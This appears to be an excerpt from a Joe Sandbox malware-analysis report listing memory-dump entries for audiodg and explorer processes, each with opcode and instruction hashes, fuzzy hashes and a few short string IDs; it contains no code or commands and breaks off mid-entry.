                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAF000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaf000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a03fa0d7a7dda3b3c7b5ef71ab800b42af244eeeac4de476f76d19028115e662
                                  • Instruction ID: a9df63b34a82d8bad9172c7a78f7892ba0dae9d3b584fb5940c75b8c3782469e
                                  • Opcode Fuzzy Hash: a03fa0d7a7dda3b3c7b5ef71ab800b42af244eeeac4de476f76d19028115e662
                                  • Instruction Fuzzy Hash: 1E215EB1E0961E9EDBA8DF2888653A8B3A1FF58310F0101FED11DD3292DF741A818F11
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4130af84ac635caf1d45a850c9177f49d90e3e635f6695edb3aa2c9f7eccc644
                                  • Instruction ID: d5839e20def5f192326544f1a01c3e994d320d683fe548c2df4f117059a2f8cc
                                  • Opcode Fuzzy Hash: 4130af84ac635caf1d45a850c9177f49d90e3e635f6695edb3aa2c9f7eccc644
                                  • Instruction Fuzzy Hash: 7E218130A0E68E8FEB99EFA884652B97BA1FF19301F0505BED429C61A2DE756540CB41
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b586d524f8467b208e32653f34366a505290ee3b3c32f627d21371ae097a352e
                                  • Instruction ID: 23ad394436b1ec332127a16af06abfb1d746d6b14f53d8112f1ba5a273e561eb
                                  • Opcode Fuzzy Hash: b586d524f8467b208e32653f34366a505290ee3b3c32f627d21371ae097a352e
                                  • Instruction Fuzzy Hash: C211BB31A0934E8FCB58DF68C4A51E97FE1FF58304F02066EE81AC32A1CB74A650CB80
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 467dff929fe433edd43c072bd7a2cf053fd7beaacd6437258fbad1e916d44e88
                                  • Instruction ID: 653b423501ad7863d492af6d10516d67dc6a298c04c72300a3e766fb5fb69b95
                                  • Opcode Fuzzy Hash: 467dff929fe433edd43c072bd7a2cf053fd7beaacd6437258fbad1e916d44e88
                                  • Instruction Fuzzy Hash: 4C11C471A0EA8D4BEBA9DFA488752B87BA0EF19304F0504BED16DC65F3DE656540CB01
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 61468a8809ff1e4c26ea59169be345615ee9d23e445466bb4bb750852b0df32a
                                  • Instruction ID: 67c29cc30b246cb9ef6fc1beed54957a215417b62d3fb9bbee6d39ba58be032b
                                  • Opcode Fuzzy Hash: 61468a8809ff1e4c26ea59169be345615ee9d23e445466bb4bb750852b0df32a
                                  • Instruction Fuzzy Hash: 0C11E231E0995E4FEB90EBA888585FD7BE1FF59300F4245BAD028C71B6EE74A6448B00
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4fae0440f4bc7351905c44dc1ff3946edcc2893bdb5e58ae8562a001c3114b69
                                  • Instruction ID: 279a1f3d391789a4393879623ff1130b8c9140747eab59fae5b20ad6cee82d65
                                  • Opcode Fuzzy Hash: 4fae0440f4bc7351905c44dc1ff3946edcc2893bdb5e58ae8562a001c3114b69
                                  • Instruction Fuzzy Hash: 69118130A0A68E4FEB95EFA488696F97BF0FF19300F0505BED429C61B2DE756640CB01
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 636e273497c3ec565defce30625c429e3f51a47aaedbde7c49824519b899e0fc
                                  • Instruction ID: f559a728991f312b91b9eacb09eba35560d50e28e92566d770b161fc5183d84f
                                  • Opcode Fuzzy Hash: 636e273497c3ec565defce30625c429e3f51a47aaedbde7c49824519b899e0fc
                                  • Instruction Fuzzy Hash: 5F11E630A0E64E5EEBA99B6484682B97BE1EF66304F01047FD01DC60E2EA686640C710
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 61c035469fe1789d9164a55276bae82eaead58386135cf89f614ad8a3d2c3631
                                  • Instruction ID: fb10c4096a39da64b75dafddc1eb0374642857aa8795679539a4417ae6669b68
                                  • Opcode Fuzzy Hash: 61c035469fe1789d9164a55276bae82eaead58386135cf89f614ad8a3d2c3631
                                  • Instruction Fuzzy Hash: 8211E370A0A65E4FE7A0EBB488685B97FE0FF18300F4605B7D41CC70A2EA34A1548B01
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a9d44eda0ece73d0bf62ab208ed8de652a40f56a45d2768ce07018e7d7667214
                                  • Instruction ID: 52b937830dbb0ead5fbfccb930bb1cb7a6e2df72397a56b53ec7c7d9f92ac39a
                                  • Opcode Fuzzy Hash: a9d44eda0ece73d0bf62ab208ed8de652a40f56a45d2768ce07018e7d7667214
                                  • Instruction Fuzzy Hash: 1C11C431A0E55E8FE751EBB4C858AA97BF0FF19301F0509B6D828C70B1EAB4E640CB50
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2bdf74ba554d30a2f618a41576e759e0b7d3c98100c142aa1e0f890bf9c5ecc4
                                  • Instruction ID: 79a5b17c231e5581c35ddffd611d2d42dbb77993129c655c86d68be976854c99
                                  • Opcode Fuzzy Hash: 2bdf74ba554d30a2f618a41576e759e0b7d3c98100c142aa1e0f890bf9c5ecc4
                                  • Instruction Fuzzy Hash: 0611A131E0A65E4FE792EBA498585F97FE0FF19300F0549B6E468C7066EA74A2848F41
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5681cbe883e3cc710544a8e6df87837107e5c0354f1c7b1b0fb6be4d9c94d88b
                                  • Instruction ID: eb6e55c206849eca732d98c44e9cc7876838877c1c0dfb130508af36128c8677
                                  • Opcode Fuzzy Hash: 5681cbe883e3cc710544a8e6df87837107e5c0354f1c7b1b0fb6be4d9c94d88b
                                  • Instruction Fuzzy Hash: 3711C430A0A64E4FE791EBB488695A9BBE0FF15300F0545B6D828C60A2EA74A1448B01
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e87514ebf9aa472359dcf77bc29c0728030699676a0d86b2852a5ad3c8d2333
                                  • Instruction ID: e2008ade969aecac1abc00f2b55937094b05dbb9454f433b52c2b86736d24074
                                  • Opcode Fuzzy Hash: 5e87514ebf9aa472359dcf77bc29c0728030699676a0d86b2852a5ad3c8d2333
                                  • Instruction Fuzzy Hash: A2118F31A0964E4BEBA9EF6484696F977A1FF18304F0505BED42DC61B2DE6566408B01
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2974ce9d2fa60cca0f2112189fda8735402e2f5b3844e7c0e5b05b4cfb6f610
                                  • Instruction ID: 29a207cdfd00c09799314560c9c0e262ba6b3cf067f32c678cbfae7d6796503c
                                  • Opcode Fuzzy Hash: b2974ce9d2fa60cca0f2112189fda8735402e2f5b3844e7c0e5b05b4cfb6f610
                                  • Instruction Fuzzy Hash: F1119031A0A64E4FEB98EFA488696B97BA0FF19304F0105BED429C61B6DE7561408B01
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96d0703fd41c563b381cd603f2506ae93bc0b97501b489400452c330ac0f1100
                                  • Instruction ID: a4b128ee2e83dacd4956dda0513aa359e65a507f08b7eacb1ec548393bef8539
                                  • Opcode Fuzzy Hash: 96d0703fd41c563b381cd603f2506ae93bc0b97501b489400452c330ac0f1100
                                  • Instruction Fuzzy Hash: 2D115E70A1A68E8FDB98EFA8C4696BD7BE1FF18304F0108BED419C61A1DB75A6408750
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b64dbb807d83e32b5cf3e3190fb7691ea50bfdb22ec031d364e896f7c10f60c4
                                  • Instruction ID: 07d778d1f0cab2425aa1bc98f2931398b98974e15262d8868f1f3214286f4b13
                                  • Opcode Fuzzy Hash: b64dbb807d83e32b5cf3e3190fb7691ea50bfdb22ec031d364e896f7c10f60c4
                                  • Instruction Fuzzy Hash: 0801B530A0E64E8FE761EBB485695A97BE1EF56300F4244B6D408C70B6EE74E694C721
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb9856126aa0d4f2b00edb14898f84d7aff6614a130b675e16d91b3b6b55a8cd
                                  • Instruction ID: 254ccf96ec6af68a8273cdb7e6f11c4df61a795fb1210cbe7d4632594f5e898e
                                  • Opcode Fuzzy Hash: fb9856126aa0d4f2b00edb14898f84d7aff6614a130b675e16d91b3b6b55a8cd
                                  • Instruction Fuzzy Hash: 0D01D470E1A64E8FE761EBA485691AD7BE1EF19300F4649BAD40CC70B2EE74E2648711
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4b8939cfc7ebdcc1ea8363ec35de2e006455f0eef95e23f42ccc7f20cdb9ea8f
                                  • Instruction ID: b7f6b0071f43ab8bebbd919832f45e77e9ee77aef4b03ac2665a25b3f9dcadc2
                                  • Opcode Fuzzy Hash: 4b8939cfc7ebdcc1ea8363ec35de2e006455f0eef95e23f42ccc7f20cdb9ea8f
                                  • Instruction Fuzzy Hash: FC01B130A0950E9FDB98EF64C4656BA77E2FF6A304F11447ED41EC31A4CE75A650CB50
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f67f560adb7267ba61556f536e18a4a5a36617730b05165d9b457d0f256c605
                                  • Instruction ID: 6517e1b23ad2e33000d1fa4caf650b9f26cc1b5c1c57c921b22cf61e3984111d
                                  • Opcode Fuzzy Hash: 1f67f560adb7267ba61556f536e18a4a5a36617730b05165d9b457d0f256c605
                                  • Instruction Fuzzy Hash: 6E01F571F0E95E4FE771EBA8C4681B97BD2EF18300F0644B6D45CC70B1EE24A5448361
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f471654587411eb69a2c3f502899f23c74b4e3c31a86e7321dd9b2a8247fab67
                                  • Instruction ID: 5a1d0ded468a839368369a6b2bf7bf41c499a6ffa356a7c1748d7ca22256e858
                                  • Opcode Fuzzy Hash: f471654587411eb69a2c3f502899f23c74b4e3c31a86e7321dd9b2a8247fab67
                                  • Instruction Fuzzy Hash: 0F01DF30E0A74E4FE765EBA489A86B97BE1EF19300F0245B6D40CC70B2EA74E250C711
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a2d4e0aa9c49fa6062da8279c668b166a0f4cefc9297251fe81f107d0e115a20
                                  • Instruction ID: 466e5596bcaacc62e7df87fe591a097d0807c14d7911f9d7f25e4d197b225f89
                                  • Opcode Fuzzy Hash: a2d4e0aa9c49fa6062da8279c668b166a0f4cefc9297251fe81f107d0e115a20
                                  • Instruction Fuzzy Hash: 0F01D830A0A54D8FDB58EF64C4655B97BA0FF19304F0604BED02AC70E2DEB5AA50CF41
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d62ed52d030de9e3cafcbb48bb9fb368129c75d4e6e3c14b442fb5a0e6eaac00
                                  • Instruction ID: 044a04f966ee4ed51559b54085b27d3579950efdba021c26a8e10f9569700efc
                                  • Opcode Fuzzy Hash: d62ed52d030de9e3cafcbb48bb9fb368129c75d4e6e3c14b442fb5a0e6eaac00
                                  • Instruction Fuzzy Hash: DB01D470A0E74D4FE762A7B489695A97FE1EF05300F0604F7C408CB0B6DA78A6688721
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 72acef97e61bd5119aa94a7cbf2b4f42b4fc5bd21ee41ce64cc07b61f69d94d8
                                  • Instruction ID: 4051dac16efcd8605562102cc8285655c726e1cfcf9e6dc923fa521c6db7ed16
                                  • Opcode Fuzzy Hash: 72acef97e61bd5119aa94a7cbf2b4f42b4fc5bd21ee41ce64cc07b61f69d94d8
                                  • Instruction Fuzzy Hash: 13018630A19A0E8AEB59EBA4C5685BDB3E1FF1C305F11447EE41EC21E5DF79A650CB10
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1d77b56043e0ef440a4e4ea932a293efaef179ec1ed64593f944f01465955e9
                                  • Instruction ID: b81b6449b630484ea894df5c30b80e9328f728c0a7b9ca110f90adfba941b298
                                  • Opcode Fuzzy Hash: a1d77b56043e0ef440a4e4ea932a293efaef179ec1ed64593f944f01465955e9
                                  • Instruction Fuzzy Hash: 9F018630A1560E8BDB58EFA4C5695BDB3A1FF1C305F11487EE41EC21E5DF75A250CA10
                                  Memory Dump Source
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $+$/$[${
                                  • API String ID: 0-1918162968
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 695a23a2e0c8b4669c38a9d01777340d7972f991ade69c9e47c7c79a1250494b
                                  • Instruction ID: 5247b79ffcf51f82df9b959074d88b6c19783106a601701c95081eff7fe34865
                                  • Opcode Fuzzy Hash: 695a23a2e0c8b4669c38a9d01777340d7972f991ade69c9e47c7c79a1250494b
                                  • Instruction Fuzzy Hash: 50128E31E1964D8FEB99EF68C8647B8BBB2FF19304F0501BAD08DD71A2CA746940CB11
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cf2279708d118f520923061d797107ceb26e0b0bd69b7fb7fc3b58f5281447c5
                                  • Instruction ID: 2b64ea3e3fd7141abd7723084fdfa53582b1591d6526be66d72b8b6677480b30
                                  • Opcode Fuzzy Hash: cf2279708d118f520923061d797107ceb26e0b0bd69b7fb7fc3b58f5281447c5
                                  • Instruction Fuzzy Hash: 03024531A0E68A4FE766AB689C251F93BB0FF06325F0501BBD449CB0A3EA7C6545C761
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ea32893a5b5026976f982b00f496e2158e27c9d7ee8d908e4f8065bfd4049fbc
                                  • Instruction ID: cc246f7404897db2b73aa21cabb59c6385f442cf6da7fb8f98c7bed7853fa2d3
                                  • Opcode Fuzzy Hash: ea32893a5b5026976f982b00f496e2158e27c9d7ee8d908e4f8065bfd4049fbc
                                  • Instruction Fuzzy Hash: F6D1D630A0A64E8FEBA5EB64C8796B97BE1FF19300F0145BED42DC71A2DE746644CB41
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9234595ca1bddadf679c52ccfb2e1f648a997a925d2a8c403eb0036edf231647
                                  • Instruction ID: 35759bb161561aa3203d22c42f86f3650ba32df2502fc31f5a08abee035bea2a
                                  • Opcode Fuzzy Hash: 9234595ca1bddadf679c52ccfb2e1f648a997a925d2a8c403eb0036edf231647
                                  • Instruction Fuzzy Hash: F4B1D130A0A68E8FD756EB64C8686F9BBF1FF19304F0645BBD419C70A2DB78A644C711
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "$$$]
                                  • API String ID: 0-2298843587
                                  • Opcode ID: 21c1c586aa9c0dcfa0563624b687ad6fe7a3099125ca8792a9add1b6d29af05e
                                  • Instruction ID: 4260cf41e7a4a69eaf1ecbb33e808bfd6596eaf852f1b7c24c13287c2d6ad79f
                                  • Opcode Fuzzy Hash: 21c1c586aa9c0dcfa0563624b687ad6fe7a3099125ca8792a9add1b6d29af05e
                                  • Instruction Fuzzy Hash: 3C51C570E1522DCFEB68DF94D8A4BECB6B1BB54300F1140AED05EA7291CB785A84DF10
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: B$]${
                                  • API String ID: 0-2568630444
                                  • Opcode ID: e7ad58fe612a21e47f9f183746a020fef47156e990c297a197dd1d3dc9d5e4a4
                                  • Instruction ID: 193c0a947b12abbf2998a4eb9d10c4eec52bc590fe3e136c6e3811da9a33c221
                                  • Opcode Fuzzy Hash: e7ad58fe612a21e47f9f183746a020fef47156e990c297a197dd1d3dc9d5e4a4
                                  • Instruction Fuzzy Hash: 3B419170E0966D8FDB78DF54C8A47E9B7B2BB54301F1101EAD40DA72A1CB786A84CF51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: h
                                  • API String ID: 0-2439710439
                                  • Opcode ID: 9eb954d624a1f443401f3d900e21a51ce0b27b36505565dd54ca942e86d77c8c
                                  • Instruction ID: e99b639af282834ea8d8acff98dc1351ec1d121c6349e3b5bf3cff6980f39d41
                                  • Opcode Fuzzy Hash: 9eb954d624a1f443401f3d900e21a51ce0b27b36505565dd54ca942e86d77c8c
                                  • Instruction Fuzzy Hash: 88315E71A0965E8FEBA8DF5488657A9B3A2FF58310F0102FAD01DD32A1DF745E808F11
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: O
                                  • API String ID: 0-878818188
                                  • Opcode ID: a81b4dd505779a9e968d179f48a74a795e220f49d8364990c9d7a0701d5213dc
                                  • Instruction ID: 1692ce029d65b98738306746e4f9579f09d3a3b8ed4ddc401db7ac2b38c9a2fc
                                  • Opcode Fuzzy Hash: a81b4dd505779a9e968d179f48a74a795e220f49d8364990c9d7a0701d5213dc
                                  • Instruction Fuzzy Hash: 4511DA71A0965D8BDBA8DF54D8A47F9B7B2FB54341F1002EE900EE2291CBB51E81CF40
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 192e30145d8619bc27843c3c055ce91e7c79bfacbb35249687dc75eadf019c92
                                  • Instruction ID: 82d68ccbdc02d1a6921de0bde4ce2f9b3195bd6a815a6d87211b492fdbd287b8
                                  • Opcode Fuzzy Hash: 192e30145d8619bc27843c3c055ce91e7c79bfacbb35249687dc75eadf019c92
                                  • Instruction Fuzzy Hash: A451C630A4A65D4FDB99EF64C8695B97BB0FF15304F0104BED42AC60E2DEB5AA44CB01
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f2bc45c33047d2c77d6751a5122dba99f3ae977b0875e729d37853849fe2b81
                                  • Instruction ID: a7d213045d9a775e112f6c623ce6b9914cdddfea8596ee762626f8dfa98f0de8
                                  • Opcode Fuzzy Hash: 7f2bc45c33047d2c77d6751a5122dba99f3ae977b0875e729d37853849fe2b81
                                  • Instruction Fuzzy Hash: 02F1D131E0A60E4FEBB4EB648864BED77A2FF55700F0142BAD01DD71E2DE786A448B54
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3db991045d51bc04c6a764827b058fb9fabaaf3ced7a0f648ee745006a3221d7
                                  • Instruction ID: c8cc586d24394f99ea436e659097a8b4824873f9b2a4abe73db9d615cd835ba0
                                  • Opcode Fuzzy Hash: 3db991045d51bc04c6a764827b058fb9fabaaf3ced7a0f648ee745006a3221d7
                                  • Instruction Fuzzy Hash: 13C1E530A0E64E8FE761EBA4C9696B97BE1FF15300F0645B6D408C70B2EE78A654C761
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1c9564388453a6758ec18f2c5e8d1d6deed69cc3247b06a7dea300065801fd1a
